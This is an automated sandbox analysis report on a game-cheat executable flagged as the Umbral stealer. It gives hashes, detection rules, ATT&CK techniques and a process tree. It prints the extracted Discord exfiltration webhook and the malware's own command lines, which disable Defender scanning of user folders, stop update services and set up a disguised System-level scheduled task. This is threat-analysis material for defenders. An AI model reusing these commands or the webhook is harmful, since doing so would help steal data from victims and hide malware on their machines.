umbral | a85235b38f90be244eb57d131951ff69a562714221d640ab9da0480af4aed06c

Analysis

max time kernel
99s
max time network
20s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
21-08-2023 15:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cheat_by_DioZ.exe
Size

15.3MB
MD5

7e8d421582aacc3651a5f8ae391e4605
SHA1

0cff4ece5e75a5dc0c5e6076ad782ecf42ad7c16
SHA256

a85235b38f90be244eb57d131951ff69a562714221d640ab9da0480af4aed06c
SHA512

7eb24ed0bddb9a681c231c92c50b52015b09466262dbdf1c1e47219f4fe76cff9adf65860d2c03cf61e8d4e7aa7ee46a7a81464773c56a81fee4a2ebec8192f1
SSDEEP

196608:0KMurhe046YIw782LRg5lA7B+juGhgdKDW/vDhoOocQ4cfVqwc7Mzg:0hurhf4Qm8MR8gwRh+n/lvoPDc70

Score

10^/10

umbral evasion stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1143115606330200074/pyKgc8H0hMiolN7TnRv_a5UZxMEV9hMyMPcyMEE79xLCjkKRbFA2ce8qYJuxmfb_M-83

Signatures

Detect Umbral payload 5 IoCs

resource	yara_rule
behavioral1/memory/2180-53-0x0000000000400000-0x000000000135C000-memory.dmp	family_umbral
behavioral1/files/0x000e00000001231a-59.dat	family_umbral
behavioral1/files/0x000e00000001231a-58.dat	family_umbral
behavioral1/files/0x000e00000001231a-56.dat	family_umbral
behavioral1/memory/2568-67-0x0000000000040000-0x0000000000080000-memory.dmp	family_umbral

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 924 created 1320	924	MS.exe	14
PID 924 created 1320	924	MS.exe	14
PID 924 created 1320	924	MS.exe	14
PID 924 created 1320	924	MS.exe	14
PID 924 created 1320	924	MS.exe	14
PID 924 created 1320	924	MS.exe	14

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	MS.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 2 IoCs

pid	Process
2568	3S.exe
924	MS.exe

Loads dropped DLL 2 IoCs

pid	Process
2180	Cheat_by_DioZ.exe
2180	Cheat_by_DioZ.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 924 set thread context of 772	924	MS.exe	46

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	MS.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2300	sc.exe
2340	sc.exe
2724	sc.exe
2760	sc.exe
2784	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
924	MS.exe
924	MS.exe
2980	powershell.exe
924	MS.exe
924	MS.exe
924	MS.exe
924	MS.exe
924	MS.exe
924	MS.exe
924	MS.exe
924	MS.exe
772	dialer.exe
772	dialer.exe
772	dialer.exe
772	dialer.exe
2688	powershell.exe
924	MS.exe
924	MS.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	2568	3S.exe
Token: SeIncreaseQuotaPrivilege	2848	wmic.exe
Token: SeSecurityPrivilege	2848	wmic.exe
Token: SeTakeOwnershipPrivilege	2848	wmic.exe
Token: SeLoadDriverPrivilege	2848	wmic.exe
Token: SeSystemProfilePrivilege	2848	wmic.exe
Token: SeSystemtimePrivilege	2848	wmic.exe
Token: SeProfSingleProcessPrivilege	2848	wmic.exe
Token: SeIncBasePriorityPrivilege	2848	wmic.exe
Token: SeCreatePagefilePrivilege	2848	wmic.exe
Token: SeBackupPrivilege	2848	wmic.exe
Token: SeRestorePrivilege	2848	wmic.exe
Token: SeShutdownPrivilege	2848	wmic.exe
Token: SeDebugPrivilege	2848	wmic.exe
Token: SeSystemEnvironmentPrivilege	2848	wmic.exe
Token: SeRemoteShutdownPrivilege	2848	wmic.exe
Token: SeUndockPrivilege	2848	wmic.exe
Token: SeManageVolumePrivilege	2848	wmic.exe
Token: 33	2848	wmic.exe
Token: 34	2848	wmic.exe
Token: 35	2848	wmic.exe
Token: SeIncreaseQuotaPrivilege	2848	wmic.exe
Token: SeSecurityPrivilege	2848	wmic.exe
Token: SeTakeOwnershipPrivilege	2848	wmic.exe
Token: SeLoadDriverPrivilege	2848	wmic.exe
Token: SeSystemProfilePrivilege	2848	wmic.exe
Token: SeSystemtimePrivilege	2848	wmic.exe
Token: SeProfSingleProcessPrivilege	2848	wmic.exe
Token: SeIncBasePriorityPrivilege	2848	wmic.exe
Token: SeCreatePagefilePrivilege	2848	wmic.exe
Token: SeBackupPrivilege	2848	wmic.exe
Token: SeRestorePrivilege	2848	wmic.exe
Token: SeShutdownPrivilege	2848	wmic.exe
Token: SeDebugPrivilege	2848	wmic.exe
Token: SeSystemEnvironmentPrivilege	2848	wmic.exe
Token: SeRemoteShutdownPrivilege	2848	wmic.exe
Token: SeUndockPrivilege	2848	wmic.exe
Token: SeManageVolumePrivilege	2848	wmic.exe
Token: 33	2848	wmic.exe
Token: 34	2848	wmic.exe
Token: 35	2848	wmic.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeShutdownPrivilege	3016	powercfg.exe
Token: SeDebugPrivilege	772	dialer.exe
Token: SeShutdownPrivilege	1924	powercfg.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeShutdownPrivilege	2488	powercfg.exe
Token: SeShutdownPrivilege	1588	powercfg.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 2568	2180	Cheat_by_DioZ.exe	28
PID 2180 wrote to memory of 2568	2180	Cheat_by_DioZ.exe	28
PID 2180 wrote to memory of 2568	2180	Cheat_by_DioZ.exe	28
PID 2180 wrote to memory of 2568	2180	Cheat_by_DioZ.exe	28
PID 2180 wrote to memory of 924	2180	Cheat_by_DioZ.exe	29
PID 2180 wrote to memory of 924	2180	Cheat_by_DioZ.exe	29
PID 2180 wrote to memory of 924	2180	Cheat_by_DioZ.exe	29
PID 2180 wrote to memory of 924	2180	Cheat_by_DioZ.exe	29
PID 2568 wrote to memory of 2848	2568	3S.exe	32
PID 2568 wrote to memory of 2848	2568	3S.exe	32
PID 2568 wrote to memory of 2848	2568	3S.exe	32
PID 2908 wrote to memory of 2724	2908	cmd.exe	39
PID 2908 wrote to memory of 2724	2908	cmd.exe	39
PID 2908 wrote to memory of 2724	2908	cmd.exe	39
PID 2908 wrote to memory of 2760	2908	cmd.exe	40
PID 2908 wrote to memory of 2760	2908	cmd.exe	40
PID 2908 wrote to memory of 2760	2908	cmd.exe	40
PID 2908 wrote to memory of 2784	2908	cmd.exe	41
PID 2908 wrote to memory of 2784	2908	cmd.exe	41
PID 2908 wrote to memory of 2784	2908	cmd.exe	41
PID 2908 wrote to memory of 2340	2908	cmd.exe	43
PID 2908 wrote to memory of 2340	2908	cmd.exe	43
PID 2908 wrote to memory of 2340	2908	cmd.exe	43
PID 2908 wrote to memory of 2300	2908	cmd.exe	42
PID 2908 wrote to memory of 2300	2908	cmd.exe	42
PID 2908 wrote to memory of 2300	2908	cmd.exe	42
PID 924 wrote to memory of 772	924	MS.exe	46
PID 2380 wrote to memory of 3016	2380	cmd.exe	49
PID 2380 wrote to memory of 3016	2380	cmd.exe	49
PID 2380 wrote to memory of 3016	2380	cmd.exe	49
PID 2380 wrote to memory of 1924	2380	cmd.exe	50
PID 2380 wrote to memory of 1924	2380	cmd.exe	50
PID 2380 wrote to memory of 1924	2380	cmd.exe	50
PID 772 wrote to memory of 420	772	dialer.exe	1
PID 772 wrote to memory of 464	772	dialer.exe	6
PID 2380 wrote to memory of 2488	2380	cmd.exe	52
PID 2380 wrote to memory of 2488	2380	cmd.exe	52
PID 2380 wrote to memory of 2488	2380	cmd.exe	52
PID 2688 wrote to memory of 2088	2688	powershell.exe	51
PID 2688 wrote to memory of 2088	2688	powershell.exe	51
PID 2688 wrote to memory of 2088	2688	powershell.exe	51
PID 2380 wrote to memory of 1588	2380	cmd.exe	53
PID 2380 wrote to memory of 1588	2380	cmd.exe	53
PID 2380 wrote to memory of 1588	2380	cmd.exe	53
PID 772 wrote to memory of 484	772	dialer.exe	7
PID 772 wrote to memory of 492	772	dialer.exe	8
PID 772 wrote to memory of 580	772	dialer.exe	23
PID 772 wrote to memory of 660	772	dialer.exe	21
PID 772 wrote to memory of 748	772	dialer.exe	9
PID 772 wrote to memory of 800	772	dialer.exe	20
PID 772 wrote to memory of 828	772	dialer.exe	18

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:748
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:828
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {427F9501-5228-4DE1-AF00-4FDB98605A6B} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    PID:1712
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:800
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:660
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:580

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:484

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:492

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1320
- C:\Users\Admin\AppData\Local\Temp\Cheat_by_DioZ.exe
  "C:\Users\Admin\AppData\Local\Temp\Cheat_by_DioZ.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Users\Admin\AppData\Local\Temp\3S.exe
    "C:\Users\Admin\AppData\Local\Temp\3S.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2848
- - C:\Users\Admin\AppData\Local\Temp\MS.exe
    "C:\Users\Admin\AppData\Local\Temp\MS.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2724
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2760
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2784
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2300
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2340
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3016
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1924
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2488
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cnxaozlt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2088
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3S.exe

Filesize
227KB

MD5
0c6f57e34c60e926869925974c0ba0c6

SHA1
c2c96e1a4da5fe008796801569ebdfcde4d3c07b

SHA256
3818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71

SHA512
70281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193

Download Submit
C:\Users\Admin\AppData\Local\Temp\3S.exe

Filesize
227KB

MD5
0c6f57e34c60e926869925974c0ba0c6

SHA1
c2c96e1a4da5fe008796801569ebdfcde4d3c07b

SHA256
3818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71

SHA512
70281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS.exe

Filesize
9.9MB

MD5
ed1da88dca5699f9e01a7e4fa08be78c

SHA1
1cc67cbe8cf95217bd7f22a1e30702bf9d45e806

SHA256
9773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413

SHA512
4e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS.exe

Filesize
9.9MB

MD5
ed1da88dca5699f9e01a7e4fa08be78c

SHA1
1cc67cbe8cf95217bd7f22a1e30702bf9d45e806

SHA256
9773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413

SHA512
4e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b9d5224abe8346c9a668967ca3a118cb

SHA1
7f657affeade1e5b265be77a2bf8d3012a66e064

SHA256
7a0c7105220386196d38673a860c5c876f5298530fde95b24d2e88d549eb33e0

SHA512
e25c4a8e2efcbeb2521e0921c598028b6522d109c39e7f8bb1afd6626b194dc48ad0220e7c957408ea14178b79ed0d81dc7809a257cd803eb7f10ab732abce79

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F6A570RIF6SFSS4MM1C9.temp

Filesize
7KB

MD5
b9d5224abe8346c9a668967ca3a118cb

SHA1
7f657affeade1e5b265be77a2bf8d3012a66e064

SHA256
7a0c7105220386196d38673a860c5c876f5298530fde95b24d2e88d549eb33e0

SHA512
e25c4a8e2efcbeb2521e0921c598028b6522d109c39e7f8bb1afd6626b194dc48ad0220e7c957408ea14178b79ed0d81dc7809a257cd803eb7f10ab732abce79

Download Submit
\Users\Admin\AppData\Local\Temp\3S.exe

Filesize
227KB

MD5
0c6f57e34c60e926869925974c0ba0c6

SHA1
c2c96e1a4da5fe008796801569ebdfcde4d3c07b

SHA256
3818bc71c250768baec123373d2e873428509f7dcef12a56f4d428d488661c71

SHA512
70281ccd28331260e0808d00a0965753e4f8d9c4b8a0e211abd97556429ad7cb3a647a017f53a8d111468639fe9c05e0022cb034f6069b6b9fff214d389ac193

Download Submit
\Users\Admin\AppData\Local\Temp\MS.exe

Filesize
9.9MB

MD5
ed1da88dca5699f9e01a7e4fa08be78c

SHA1
1cc67cbe8cf95217bd7f22a1e30702bf9d45e806

SHA256
9773bcd1383410649884abe2985277f4d51e839f6f49446d13ab67e0bd18f413

SHA512
4e5a80bbe65c90a25b6f7907acf269c46ddb0ad09ac859c806e03e3aa0854afcb4d08e1e4176b8dfe9b852b91f7bf1ab510f53ae6945b654083561ecc7a7e2ef

Download Submit
memory/420-91-0x0000000000720000-0x0000000000741000-memory.dmp

Filesize
132KB

Download
memory/420-93-0x0000000000750000-0x0000000000777000-memory.dmp

Filesize
156KB

Download
memory/420-125-0x0000000076D41000-0x0000000076D42000-memory.dmp

Filesize
4KB

Download
memory/420-104-0x0000000036D30000-0x0000000036D40000-memory.dmp

Filesize
64KB

Download
memory/420-101-0x000007FEBED70000-0x000007FEBED80000-memory.dmp

Filesize
64KB

Download
memory/420-122-0x0000000000750000-0x0000000000777000-memory.dmp

Filesize
156KB

Download
memory/420-92-0x0000000000720000-0x0000000000741000-memory.dmp

Filesize
132KB

Download
memory/464-128-0x0000000000110000-0x0000000000137000-memory.dmp

Filesize
156KB

Download
memory/464-111-0x000007FEBED70000-0x000007FEBED80000-memory.dmp

Filesize
64KB

Download
memory/464-112-0x0000000036D30000-0x0000000036D40000-memory.dmp

Filesize
64KB

Download
memory/464-108-0x0000000000110000-0x0000000000137000-memory.dmp

Filesize
156KB

Download
memory/484-132-0x00000000000C0000-0x00000000000E7000-memory.dmp

Filesize
156KB

Download
memory/484-137-0x0000000076D41000-0x0000000076D42000-memory.dmp

Filesize
4KB

Download
memory/484-134-0x00000000000C0000-0x00000000000E7000-memory.dmp

Filesize
156KB

Download
memory/492-140-0x0000000000460000-0x0000000000487000-memory.dmp

Filesize
156KB

Download
memory/492-138-0x0000000000460000-0x0000000000487000-memory.dmp

Filesize
156KB

Download
memory/492-141-0x0000000036D30000-0x0000000036D40000-memory.dmp

Filesize
64KB

Download
memory/492-139-0x000007FEBED70000-0x000007FEBED80000-memory.dmp

Filesize
64KB

Download
memory/580-153-0x0000000036D30000-0x0000000036D40000-memory.dmp

Filesize
64KB

Download
memory/580-149-0x000007FEBED70000-0x000007FEBED80000-memory.dmp

Filesize
64KB

Download
memory/580-147-0x0000000000220000-0x0000000000247000-memory.dmp

Filesize
156KB

Download
memory/580-167-0x0000000000220000-0x0000000000247000-memory.dmp

Filesize
156KB

Download
memory/660-150-0x00000000004B0000-0x00000000004D7000-memory.dmp

Filesize
156KB

Download
memory/660-158-0x000007FEBED70000-0x000007FEBED80000-memory.dmp

Filesize
64KB

Download
memory/660-160-0x0000000036D30000-0x0000000036D40000-memory.dmp

Filesize
64KB

Download
memory/748-156-0x0000000000A40000-0x0000000000A67000-memory.dmp

Filesize
156KB

Download
memory/748-162-0x000007FEBED70000-0x000007FEBED80000-memory.dmp

Filesize
64KB

Download
memory/748-166-0x0000000036D30000-0x0000000036D40000-memory.dmp

Filesize
64KB

Download
memory/772-106-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/772-89-0x0000000076BD0000-0x0000000076CEF000-memory.dmp

Filesize
1.1MB

Download
memory/772-87-0x0000000076CF0000-0x0000000076E99000-memory.dmp

Filesize
1.7MB

Download
memory/800-165-0x000007FEBED70000-0x000007FEBED80000-memory.dmp

Filesize
64KB

Download
memory/800-168-0x0000000036D30000-0x0000000036D40000-memory.dmp

Filesize
64KB

Download
memory/800-161-0x00000000008B0000-0x00000000008D7000-memory.dmp

Filesize
156KB

Download
memory/828-171-0x0000000000870000-0x0000000000897000-memory.dmp

Filesize
156KB

Download
memory/924-100-0x000000013F8A0000-0x000000014029D000-memory.dmp

Filesize
10.0MB

Download
memory/924-69-0x000000013F8A0000-0x000000014029D000-memory.dmp

Filesize
10.0MB

Download
memory/924-117-0x000000013F8A0000-0x000000014029D000-memory.dmp

Filesize
10.0MB

Download
memory/2180-53-0x0000000000400000-0x000000000135C000-memory.dmp

Filesize
15.4MB

Download
memory/2568-66-0x000007FEF5330000-0x000007FEF5D1C000-memory.dmp

Filesize
9.9MB

Download
memory/2568-68-0x000000001B0F0000-0x000000001B170000-memory.dmp

Filesize
512KB

Download
memory/2568-67-0x0000000000040000-0x0000000000080000-memory.dmp

Filesize
256KB

Download
memory/2568-70-0x000007FEF5330000-0x000007FEF5D1C000-memory.dmp

Filesize
9.9MB

Download
memory/2688-103-0x0000000001FE0000-0x0000000001FE8000-memory.dmp

Filesize
32KB

Download
memory/2688-99-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/2688-123-0x000007FEF49E0000-0x000007FEF537D000-memory.dmp

Filesize
9.6MB

Download
memory/2688-124-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/2688-126-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/2688-127-0x0000000002490000-0x0000000002510000-memory.dmp

Filesize
512KB

Download
memory/2688-129-0x000007FEF49E0000-0x000007FEF537D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-79-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/2980-82-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/2980-83-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-81-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-76-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-77-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download
memory/2980-75-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/2980-78-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2980-80-0x0000000002680000-0x0000000002700000-memory.dmp

Filesize
512KB

Download